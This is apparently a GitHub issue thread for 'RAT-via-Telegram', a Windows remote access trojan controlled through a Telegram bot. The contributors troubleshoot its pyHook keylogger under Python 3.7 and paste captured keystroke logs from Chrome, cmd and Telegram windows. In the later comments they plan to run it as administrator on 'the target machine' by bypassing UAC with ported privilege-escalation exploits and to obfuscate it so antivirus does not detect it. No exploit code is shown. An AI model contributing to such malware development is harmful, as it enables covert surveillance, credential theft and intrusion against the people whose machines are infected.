Keylogs problem

[Dagdelo]

After starting the server this log is spill:

File "C:\Python37\lib\ctypes_init_.py", line 63, in create_string_buffer
raise TypeError(init)

The lines of codes that the log complains about it:

118> executable = ctypes.create_string_buffer("\x00" * 512)
...
134> data = get_curr_window()
...

[mvrozanti]

We recently moved to python 3.7 there might be a few bugs here and there. I'm already looking into it

[mvrozanti]

Please try 13a7b8d (lines 119 and 122)

[mvrozanti]

Didn't mean to close this.
@Dagdelo Please try pip install pyHook-1.5.1-cp37-cp37m-win_amd64.whl and recompiling; we added a new pyHook wheel for Python3.7

[Dagdelo]

Well seems to be fix, but still don't work properly.

                Got message from 400496256: /keylogs


TypeError: KeyboardSwitch() missing 8 required positional arguments: 'msg', 'vk_code', 'scan_code', 'ascii', 'flags', 'time', 'hwnd', and 'win_name'

The keylogs output file:

[ PID 10500 - b'Telegram.exe' - b'Telegram' ]
PCKEKEYLOGS
[ PID 10500 - b'Telegram.exe' - b'Telegram' ]
KEKEY

Seem's to only keylogged the Telegram window. I type over Chrome and Whatsapp. And of course, after the complain the servers stops.

[mvrozanti]

Are you sure you have recompiled? I'm getting ok results on Chrome browser:

[ PID 1728 - b'chrome.exe' - b'test - Pesquisa Google - Google Chrome' ]
EH<Back><Back><Back><Back><Back><Back>ESTE<Space>EH<Space>UM<Space>TESTE<Space>AMIGO<Return>
[ PID 2952 - b'cmd.exe' - b'C:\\Windows\\system32\\cmd.exe - RATAttack.exe' ]
<Lcontrol><Lmenu><Tab>
[ PID 1176 - b'Explorer.EXE' - b'Documents' ]
<Lmenu><Tab>

[Dagdelo]

Yeah, I'm Recompile and the RATAttack.exe works well, buts is for another issue... But unfortunutelly only logs on telegram window... And after while this logs output in the server:

TypeError: KeyboardSwitch() missing 8 required positional arguments: 'msg', 'vk_code', 'scan_code', 'ascii', 'flags', 'time', 'hwnd', and 'win_name'

[mvrozanti]

We actually changed the pyHook wheel to match Python 3.7; can you try running pip install pyHook-1.5.1-cp37-cp37m-win_amd64.whl and recompiling?

[Dagdelo]

With original pyHook, on Python 3.7/Windows 10:

C:\RAT-via-Telegram>python RATAttack.py
{'message_id': 223, 'from': {'id': xxxxxxxxx, 'is_bot': True, 'first_name': 'RAT Bot', 'username': 'D83_bot'}, 'chat': {'id': yyyyyyyyy, 'first_name': 'Henrique', 'type': 'private'}, 'date': 1540240212, 'text': "Dagdelo: I'm up."}
Dagdelo: I'm up.
Listening for commands on Dagdelo...
<Lwin><Lwin><Lwin>DBLOCO<Return>
TypeError: KeyboardSwitch() missing 8 required positional arguments: 'msg', 'vk_code', 'scan_code', 'ascii', 'flags', 'time', 'hwnd', and 'win_name'

With pyHook fixed version from Answeror (found on this reddit post):

C:\RAT-via-Telegram>python RATAttack.py
{'message_id': 224, 'from': {'id': 663000828, 'is_bot': True, 'first_name': 'RAT Bot', 'username': 'D83_bot'}, 'chat': {'id': 400496256, 'first_name': 'Henrique', 'type': 'private'}, 'date': 1540240784, 'text': "Dagdelo: I'm up."}
Dagdelo: I'm up.
Listening for commands on Dagdelo...
C:\RAT-via-Telegram>

With this the program simples stops to working after opening notepad (Bloco de notas) or typing some combinations like 'Alt+Tab'; 'Win+D'; 'Win+M' ... etc.

[mvrozanti]

Can you post the output of python -V?

[Dagdelo]

Here the output (much longer then I was expected!) If you want python -V:

C:\Users\Henrique>python -V
Python 3.7.0

[mvrozanti]

The problem

Probable fix

Another problem:

Known bugs
PyInstaller can't build single-file executables using pyHook. This may be fixed in 1.5.1, but hasn't been tested.

We could try and replace current pyHook module but it seems a lot of work; I'm yet to read this fork

[Dagdelo]

Cool. But u looked at https://github.com/Answeror/pyhook_py3k ?

[mvrozanti]

Seems legit but I still gotta take the time to read it; if it works we can add it as a submodule

[mvrozanti]

Can others confirm this issue in their machines?

[Dagdelo]

Sobre o programa não conseguir registrar o chrome: isso só acontece quando o chrome está sendo executado com privilégios administrativos (como administrador) e o programa está sendo executado sem esses privilégios.

Sobre o programa encerrar quando encontrar certos caracteres no título de janelas: isso é um bug do pyhook com relação a encode.

--

About the program can not register chrome: this only happens when chrome is running with administrative privileges (as administrator) and the program is running without these privileges.

On the program quit when encountering certain characters in the title of windows: this is a pyhook bug with respect to encode.

[mvrozanti]

It should be the other way around: the RAT being run as admin and Chrome (usually) being opened with regular priviledges. Did you get it working though? Is this a closeable issue?

[Dagdelo]

Yeah. But for run with admin in the target machine, it needs to bypass UAC or find another way to escalate privileges to admin.

[mvrozanti]

I'm not sure if the latest windows versions are still vulnerable but... can anyone test this?

[Dagdelo]

I think it's pretty complicated. There are several exploits in various languages but in python I do not know any ... And you still need to obfuscate the code so that the anti-virus does not detect it.

[Ali-Fani]

I'm not sure if the latest windows versions are still vulnerable but... can anyone test this?

it works but its python 2.7 needs to be ported

[dudeisbrendan03]

pwnage

[dudeisbrendan03]

Examples of UAC bypasses in python

[Dagdelo]

pwnage

Note found.

[Ali-Fani]

Can others confirm this issue in their machines?

it happends here too

[dudeisbrendan03]

My bad this is pwnage

[dudeisbrendan03]

Put the wrong link @Dagdelo that one works ^

[mvrozanti]

Huge dependency but seems so useful. Great find. I wonder if it's worth the bloat.

[dudeisbrendan03]

It's on 2.7, instead of using it as a dependency go ahead and look for one UAC exploit that currently works - mold that into something we can use and then credit the original user. No point in bringing in everything

[dudeisbrendan03]

It would be a lot of work to bring it all anyway, would have to make it all functional on PY3